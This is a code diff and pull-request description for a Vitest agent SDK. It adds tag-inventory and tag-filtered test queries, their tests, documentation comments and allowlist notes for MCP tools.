+				const fileP = yield* store.ensureFile("src/p.test.ts");
+				const [modP] = yield* store.writeModules(runP, [
+					{ fileId: fileP, relativeModuleId: "src/p.test.ts", state: "passed", duration: 20 },
+				]);
+				yield* store.writeTestCases(modP, [{ name: "int p", fullName: "p > int p", state: "passed", tags: ["int"] }]);
+
+				// proj-q: test with "int" too, but we'll filter to proj-p only
+				const runQ = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-tft-q",
+					project: "proj-q",
+					settingsHash: "tag-tft-scope-hash",
+				});
+				const fileQ = yield* store.ensureFile("src/q.test.ts");
+				const [modQ] = yield* store.writeModules(runQ, [
+					{ fileId: fileQ, relativeModuleId: "src/q.test.ts", state: "passed", duration: 15 },
+				]);
+				yield* store.writeTestCases(modQ, [{ name: "int q", fullName: "q > int q", state: "passed", tags: ["int"] }]);
+
+				return yield* reader.listTestsForTag("int", { project: "proj-p" });
+			}),
+		);
+
+		expect(result.length).toBe(1);
+		expect(result[0].fullName).toBe("p > int p");
+	});
+});
+
+// ─── Behavior 6: older runs are excluded ─────────────────────────────────────
+
+describe("listTagInventory + listTestsForTag — older run exclusion", () => {
+	it("should exclude tags that only appear in older runs and not in the latest run", async () => {
+		const { inventoryResult, testsResult } = await run(
+			Effect.gen(function* () {
+				const store = yield* DataStore;
+				const reader = yield* DataReader;
+
+				yield* store.writeSettings("tag-old-hash", settingsInput, {});
+
+				// Older run: has test tagged "old-tag"
+				const oldRun = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-old-run",
+					project: "proj-old",
+					settingsHash: "tag-old-hash",
+					timestamp: "2026-04-01T00:00:00.000Z",
+				});
+				const fileOld = yield* store.ensureFile("src/old.test.ts");
+				const [modOld] = yield* store.writeModules(oldRun, [
+					{ fileId: fileOld, relativeModuleId: "src/old.test.ts", state: "passed", duration: 100 },
+				]);
+				yield* store.writeTestCases(modOld, [
+					{ name: "old tagged test", fullName: "old > old tagged test", state: "passed", tags: ["old-tag"] },
+				]);
+
+				// Newer run (same project): no tags at all
+				const newRun = yield* store.writeRun({
+					...baseRunInput,
+					invocationId: "tag-new-run",
+					project: "proj-old",
+					settingsHash: "tag-old-hash",
+					timestamp: "2026-05-01T00:00:00.000Z",
+				});
+				const fileNew = yield* store.ensureFile("src/new.test.ts");
+				const [modNew] = yield* store.writeModules(newRun, [
+					{ fileId: fileNew, relativeModuleId: "src/new.test.ts", state: "passed", duration: 80 },
+				]);
+				yield* store.writeTestCases(modNew, [
+					{ name: "new untagged test", fullName: "new > new untagged test", state: "passed" },
+				]);
+
+				const inventoryResult = yield* reader.listTagInventory({ project: "proj-old" });
+				const testsResult = yield* reader.listTestsForTag("old-tag", { project: "proj-old" });
+
+				return { inventoryResult, testsResult };
+			}),
+		);
+
+		// "old-tag" only existed in the older run — should be excluded from both
+		expect(inventoryResult).toEqual([]);
+		expect(testsResult).toEqual([]);
+	});
+});

--- a/packages/sdk/src/contracts/reporter.ts
+++ b/packages/sdk/src/contracts/reporter.ts
@@ -90,19 +90,20 @@ export interface ResolvedReporterConfig {
 	 */
 	readonly transport?: Transport;
 	/**
-	 * Project-level default for Vitest's `test.passWithNoTests` policy,
-	 * captured from the resolved Vitest config at `configureVitest` time.
+	 * Snapshot of Vitest's `test.passWithNoTests` policy captured from
+	 * the resolved config at `configureVitest` time.
 	 *
-	 * Used by the MCP `run_tests` tool as the fallback when its per-call
-	 * `passWithNoTests` override is unset. Controls pass/fail
-	 * classification and CLI exit-code semantics only — does not reshape
-	 * the MCP response (the `no-match` discriminator is filter-driven,
-	 * not policy-driven).
+	 * Informational for consumer reporters that want to render the
+	 * resolved policy alongside other run context. The MCP `run_tests`
+	 * tool does not read this field — when its per-call
+	 * `passWithNoTests` override is unset the tool forwards nothing to
+	 * `createVitest`, and Vitest re-resolves from the project config on
+	 * disk. The `no-match` discriminator is filter-driven and is not
+	 * affected by this policy.
 	 *
 	 * Optional because the field is only present when populated by the
-	 * plugin; consumers that construct `ResolvedReporterConfig` directly
-	 * may omit it and the MCP layer treats `undefined` as Vitest's own
-	 * default (`false`).
+	 * plugin; consumers constructing `ResolvedReporterConfig` directly
+	 * may omit it.
 	 */
 	readonly passWithNoTests?: boolean;
 }

--- a/packages/sdk/src/contracts/reporter.ts
+++ b/packages/sdk/src/contracts/reporter.ts
@@ -89,6 +89,22 @@ export interface ResolvedReporterConfig {
 	 * differently against a cloud DB). 2.x ships only `{ kind: "local" }`.
 	 */
 	readonly transport?: Transport;
+	/**
+	 * Project-level default for Vitest's `test.passWithNoTests` policy,
+	 * captured from the resolved Vitest config at `configureVitest` time.
+	 *
+	 * Used by the MCP `run_tests` tool as the fallback when its per-call
+	 * `passWithNoTests` override is unset. Controls pass/fail
+	 * classification and CLI exit-code semantics only — does not reshape
+	 * the MCP response (the `no-match` discriminator is filter-driven,
+	 * not policy-driven).
+	 *
+	 * Optional because the field is only present when populated by the
+	 * plugin; consumers that construct `ResolvedReporterConfig` directly
+	 * may omit it and the MCP layer treats `undefined` as Vitest's own
+	 * default (`false`).
+	 */
+	readonly passWithNoTests?: boolean;
 }
 
 /**

--- a/packages/sdk/src/layers/DataReaderLive.ts
+++ b/packages/sdk/src/layers/DataReaderLive.ts
@@ -24,6 +24,7 @@ import type {
 	SettingsListEntry,
 	SettingsRow,
 	SuiteListEntry,
+	TagInventoryRow,
 	TddArtifactRow,
 	TddTaskDetail,
 	TddTaskSummary,
@@ -2295,6 +2296,137 @@ export const DataReaderLive: Layer.Layer<DataReader, never, SqlClient> = Layer.e
 				),
 			);
 
+		const listTagInventory = (options?: {
+			readonly project?: string;
+		}): Effect.Effect<ReadonlyArray<TagInventoryRow>, DataStoreError> =>
+			Effect.gen(function* () {
+				yield* Effect.logDebug("listTagInventory").pipe(Effect.annotateLogs({ project: options?.project }));
+
+				if (options?.project) {
+					// Project-scoped: find the latest run for the specific project, then
+					// count test cases carrying each tag in that run.
+					const runs = yield* sql<{ id: number }>`SELECT id FROM test_runs
+						WHERE project = ${options.project}
+						ORDER BY timestamp DESC LIMIT 1`;
+
+					if (runs.length === 0) return [];
+					const runId = runs[0].id;
+
+					const rows = yield* sql<{ tag: string; project: string; test_count: number }>`
+						SELECT t.name AS tag, ${options.project} AS project, COUNT(tc.id) AS test_count
+						FROM test_cases tc
+						JOIN test_modules tm ON tm.id = tc.module_id
+						JOIN test_case_tags tct ON tct.test_case_id = tc.id
+						JOIN tags t ON t.id = tct.tag_id
+						WHERE tm.run_id = ${runId}
+						GROUP BY t.name
+						ORDER BY t.name
+					`;
+
+					return rows.map((r) => ({
+						tag: r.tag,
+						project: r.project,
+						testCount: r.test_count,
+					}));
+				}
+
+				// Unscoped: for each project find its latest run, then aggregate tags.
+				// Uses a subquery to pick the max(timestamp) run per project so that
+				// only the most recent run contributes to the inventory.
+				const rows = yield* sql<{ tag: string; project: string; test_count: number }>`
+					SELECT t.name AS tag, tr.project AS project, COUNT(tc.id) AS test_count
+					FROM test_runs tr
+					JOIN (
+						SELECT project, MAX(timestamp) AS max_ts
+						FROM test_runs
+						GROUP BY project
+					) latest ON tr.project = latest.project AND tr.timestamp = latest.max_ts
+					JOIN test_modules tm ON tm.run_id = tr.id
+					JOIN test_cases tc ON tc.module_id = tm.id
+					JOIN test_case_tags tct ON tct.test_case_id = tc.id
+					JOIN tags t ON t.id = tct.tag_id
+					GROUP BY tr.project, t.name
+					ORDER BY tr.project, t.name
+				`;
+
+				return rows.map((r) => ({
+					tag: r.tag,
+					project: r.project,
+					testCount: r.test_count,
+				}));
+			}).pipe(
+				Effect.annotateLogs("service", "DataReader"),
+				Effect.mapError((e) => new DataStoreError({ operation: "read", table: "tags", reason: extractSqlReason(e) })),
+			);
+
+		const listTestsForTag = (
+			tag: string,
+			options?: { readonly project?: string },
+		): Effect.Effect<ReadonlyArray<TestListEntry>, DataStoreError> =>
+			Effect.gen(function* () {
+				yield* Effect.logDebug("listTestsForTag").pipe(Effect.annotateLogs({ tag, project: options?.project }));
+
+				if (options?.project) {
+					// Project-scoped
+					const runs = yield* sql<{ id: number }>`SELECT id FROM test_runs
+						WHERE project = ${options.project}
+						ORDER BY timestamp DESC LIMIT 1`;
+
+					if (runs.length === 0) return [];
+					const runId = runs[0].id;
+
+					const rows = yield* sql<{
+						id: number;
+						full_name: string;
+						state: string;
+						duration: number | null;
+						file_path: string;
+						classification: string | null;
+					}>`
+						SELECT tc.id, tc.full_name, tc.state, tc.duration, f.path AS file_path, tc.classification
+						FROM test_cases tc
+						JOIN test_modules tm ON tm.id = tc.module_id
+						JOIN files f ON f.id = tm.file_id
+						JOIN test_case_tags tct ON tct.test_case_id = tc.id
+						JOIN tags t ON t.id = tct.tag_id
+						WHERE tm.run_id = ${runId} AND t.name = ${tag}
+						ORDER BY tc.full_name
+					`;
+
+					return rows.map(mapTestListRow);
+				}
+
+				// Unscoped: one result set across all projects' latest runs
+				const rows = yield* sql<{
+					id: number;
+					full_name: string;
+					state: string;
+					duration: number | null;
+					file_path: string;
+					classification: string | null;
+				}>`
+					SELECT tc.id, tc.full_name, tc.state, tc.duration, f.path AS file_path, tc.classification
+					FROM test_runs tr
+					JOIN (
+						SELECT project, MAX(timestamp) AS max_ts
+						FROM test_runs
+						GROUP BY project
+					) latest ON tr.project = latest.project AND tr.timestamp = latest.max_ts
+					JOIN test_modules tm ON tm.run_id = tr.id
+					JOIN files f ON f.id = tm.file_id
+					JOIN test_cases tc ON tc.module_id = tm.id
+					JOIN test_case_tags tct ON tct.test_case_id = tc.id
+					JOIN tags t ON t.id = tct.tag_id
+					WHERE t.name = ${tag}
+					ORDER BY tr.project, tc.full_name
+				`;
+
+				return rows.map(mapTestListRow);
+			}).pipe(
+				Effect.annotateLogs("service", "DataReader"),
+				Effect.mapError((e) => new DataStoreError({ operation: "read", table: "tags", reason: extractSqlReason(e) })),
+			);
+
 		return {
 			getLatestRun,
 			getRunsByProject,
@@ -2341,6 +2473,8 @@ export const DataReaderLive: Layer.Layer<DataReader, never, SqlClient> = Layer.e
 			listHypotheses,
 			findIdempotentResponse,
 			getLatestTestCaseForSession,
+			listTagInventory,
+			listTestsForTag,
 		};
 	}),
 );

--- a/packages/sdk/src/layers/DataReaderLive.ts
+++ b/packages/sdk/src/layers/DataReaderLive.ts
@@ -2312,8 +2312,15 @@ export const DataReaderLive: Layer.Layer<DataReader, never, SqlClient> = Layer.e
 					if (runs.length === 0) return [];
 					const runId = runs[0].id;
 
-					const rows = yield* sql<{ tag: string; project: string; test_count: number }>`
-						SELECT t.name AS tag, ${options.project} AS project, COUNT(tc.id) AS test_count
+					const rows = yield* sql<{
+						tag: string;
+						project: string;
+						module_count: number;
+						test_count: number;
+					}>`
+						SELECT t.name AS tag, ${options.project} AS project,
+							COUNT(DISTINCT tm.id) AS module_count,
+							COUNT(tc.id) AS test_count
 						FROM test_cases tc
 						JOIN test_modules tm ON tm.id = tc.module_id
 						JOIN test_case_tags tct ON tct.test_case_id = tc.id
@@ -2326,6 +2333,7 @@ export const DataReaderLive: Layer.Layer<DataReader, never, SqlClient> = Layer.e
 					return rows.map((r) => ({
 						tag: r.tag,
 						project: r.project,
+						moduleCount: r.module_count,
 						testCount: r.test_count,
 					}));
 				}
@@ -2333,8 +2341,15 @@ export const DataReaderLive: Layer.Layer<DataReader, never, SqlClient> = Layer.e
 				// Unscoped: for each project find its latest run, then aggregate tags.
 				// Uses a subquery to pick the max(timestamp) run per project so that
 				// only the most recent run contributes to the inventory.
-				const rows = yield* sql<{ tag: string; project: string; test_count: number }>`
-					SELECT t.name AS tag, tr.project AS project, COUNT(tc.id) AS test_count
+				const rows = yield* sql<{
+					tag: string;
+					project: string;
+					module_count: number;
+					test_count: number;
+				}>`
+					SELECT t.name AS tag, tr.project AS project,
+						COUNT(DISTINCT tm.id) AS module_count,
+						COUNT(tc.id) AS test_count
 					FROM test_runs tr
 					JOIN (
 						SELECT project, MAX(timestamp) AS max_ts
@@ -2352,6 +2367,7 @@ export const DataReaderLive: Layer.Layer<DataReader, never, SqlClient> = Layer.e
 				return rows.map((r) => ({
 					tag: r.tag,
 					project: r.project,
+					moduleCount: r.module_count,
 					testCount: r.test_count,
 				}));
 			}).pipe(

--- a/packages/sdk/src/services/DataReader.ts
+++ b/packages/sdk/src/services/DataReader.ts
@@ -268,6 +268,11 @@ export interface TagInventoryRow {
 	/** The Vitest project this tag was observed in. */
 	readonly project: string;
 	/**
+	 * Number of distinct test modules in the project's latest run that contain
+	 * at least one test case carrying this tag.
+	 */
+	readonly moduleCount: number;
+	/**
 	 * Number of test cases in the project's latest run that carry this tag.
 	 */
 	readonly testCount: number;

--- a/packages/sdk/src/services/DataReader.ts
+++ b/packages/sdk/src/services/DataReader.ts
@@ -262,6 +262,17 @@ export interface TddArtifactRow {
 	readonly recordedAt: string;
 }
 
+export interface TagInventoryRow {
+	/** The tag name (e.g. `"int"`, `"e2e"`, `"unit"`). */
+	readonly tag: string;
+	/** The Vitest project this tag was observed in. */
+	readonly project: string;
+	/**
+	 * Number of test cases in the project's latest run that carry this tag.
+	 */
+	readonly testCount: number;
+}
+
 export class DataReader extends Context.Tag("vitest-agent/DataReader")<
 	DataReader,
 	{
@@ -377,5 +388,21 @@ export class DataReader extends Context.Tag("vitest-agent/DataReader")<
 			key: string,
 		) => Effect.Effect<Option.Option<string>, DataStoreError>;
 		readonly getLatestTestCaseForSession: (chatId: string) => Effect.Effect<Option.Option<number>, DataStoreError>;
+		/**
+		 * Returns one `TagInventoryRow` per `(tag, project)` pair observed in
+		 * each project's latest test run. When `project` is supplied, results
+		 * are restricted to that project's latest run.
+		 */
+		readonly listTagInventory: (options?: {
+			readonly project?: string;
+		}) => Effect.Effect<ReadonlyArray<TagInventoryRow>, DataStoreError>;
+		/**
+		 * Returns every `TestListEntry` from the latest run of each project
+		 * (or the specified project) whose test case carries `tag`.
+		 */
+		readonly listTestsForTag: (
+			tag: string,
+			options?: { readonly project?: string },
+		) => Effect.Effect<ReadonlyArray<TestListEntry>, DataStoreError>;
 	}
 >() {}

--- a/packages/ui/src/index.ts
+++ b/packages/ui/src/index.ts
@@ -40,7 +40,7 @@ export {
 } from "vitest-agent-sdk";
 // Dispatcher surface (T6 UI rewrite) — internal callers can use these
 // to drive the same code paths the preassembled default reporter uses.
-export type { AgentCellFn, Cell } from "./dispatcher/cell-types.js";
+export type { AgentCellFn, Cell, InkCellFn } from "./dispatcher/cell-types.js";
 export { classifyOutcome, classifyRunShape } from "./dispatcher/classify.js";
 export { dispatch, dispatchInk, dispatcherTable } from "./dispatcher/dispatch.js";
 export { buildFooter, dominantClassification } from "./dispatcher/footer.js";

--- a/plugin/hooks/lib/safe-mcp-vitest-agent-ops.txt
+++ b/plugin/hooks/lib/safe-mcp-vitest-agent-ops.txt
@@ -25,14 +25,20 @@ file_coverage
 cache_health
 configure
 
-# === Phase 3: consolidated test inspection (list/get/for_file) ===
+# === Phase 3: consolidated test inspection (list/get/for_file/for_tag) ===
+# T2 added the for_tag action; auto-allow continues to apply because
+# this allowlist is tool-name keyed, not action keyed.
 test
 
-# === Phase 3: consolidated discovery (project/module/suite/session) ===
+# === Phase 3: consolidated discovery (project/module/suite/session/tag) ===
+# T2 added the tag kind; the parent tool name remains inventory so
+# auto-allow continues to apply.
 inventory
 settings_list
 
 # === Mutation: runs tests via Vitest's programmatic API ===
+# T2 added tags (TagFilter) and passWithNoTests inputs plus the
+# no-match result discriminator. The tool name remains run_tests.
 run_tests
 
 # === Phase 3: consolidated note CRUD (create/list/get/update/delete/search) ===


### PR DESCRIPTION
## Summary

- **T2 — Wave 2 first workstream.** Adds the tag-filtering MCP surface and the no-match discriminator agents need to target test subsets with Vitest 4.1 native tags. All seven phases from the spec landed; 1763/1763 tests pass; cross-package typecheck and build (dev + prod) green.
- **New SDK reader methods**: `listTagInventory` and `listTestsForTag` on `DataReader` (returns `(tag, project, moduleCount, testCount)` rows from the latest run per project).
- **`run_tests` gains structured tag filtering**: optional `tags: { all?, any?, none? }` and a per-call `passWithNoTests` override. The plugin reads Vitest's native `test.passWithNoTests` from the resolved config and threads it onto `ResolvedReporterConfig` (no new `AgentPluginOptions` field). A pure `composeTagExpression` helper flattens the filter to Vitest's tag-expression. `RunTestsResult` gains a fourth `kind: "no-match"` discriminator carrying the resolved filter context — emitted when the resolved filter matches zero test cases, independent of `passWithNoTests` policy.
- **Tag introspection**: `inventory({ kind: "tag", project? })` with asymmetric scoped (`tag_scoped`) and unscoped (`tag_unscoped` with inline `byProject` per-tag breakdown) output shapes; `test({ action: "for_tag", tag, project? })` mirroring `for_file` with per-project groups.
- **Help catalog + allowlist** updated for the new variants; the tool-name-keyed allowlist already auto-allows them via the existing `run_tests`, `inventory`, `test` entries.
- **Design docs** updated: `components/mcp.md`, `schemas.md`, `packages/mcp/CLAUDE.md`.

Spec: `docs/superpowers/specs/done/2.0-tag-filtering-mcp.md` (archived as part of this PR).

Phases covered (one commit per phase, plus a TDD-orchestrator green commit on Phase 1 and a follow-up `moduleCount` fix):

1. SDK reader: `listTagInventory` + `listTestsForTag` against the existing `tags` / `test_case_tags` schema.
2. Plugin reads `test.passWithNoTests` from Vitest's resolved config and threads it onto `ResolvedReporterConfig`.
3. MCP `run_tests`: tag filter input, `composeTagExpression` helper, `RunTestsNoMatch` discriminator, `sanitizeTestArgs` extension to tag values, `formatRunTestsMarkdown` no-match branch.
4. MCP `inventory({ kind: "tag" })`: scoped + unscoped output shapes with the byProject pivot.
5. MCP `test({ action: "for_tag" })`: per-project grouping mirroring `for_file`.
6. Plugin allowlist + help-tool catalog cover the new variants.
7. Integration tests (`run-tests-tag-filter.int.test.ts`) plus design doc + CLAUDE.md updates.

## Test plan

- [x] `pnpm typecheck` green across all six packages
- [x] `pnpm test` green — 1763/1763 passing
- [x] `pnpm build` green — 12 tasks (6 packages × dev + prod)
- [x] Integration test exercises inventory + for_tag against a multi-tag fixture via the tRPC caller
- [x] composeTagExpression unit-tested across 9 input shapes including all/any/none combinations and the spec's worked examples
- [x] RunTestsNoMatch schema round-trips through encode + decode alongside the existing ok / timeout / error variants
- [x] passWithNoTests threading verified in `plugin.test.ts` against four input shapes (true / false / absent / malformed)

Signed-off-by: C. Spencer Beggs <spencer@beggs.codes>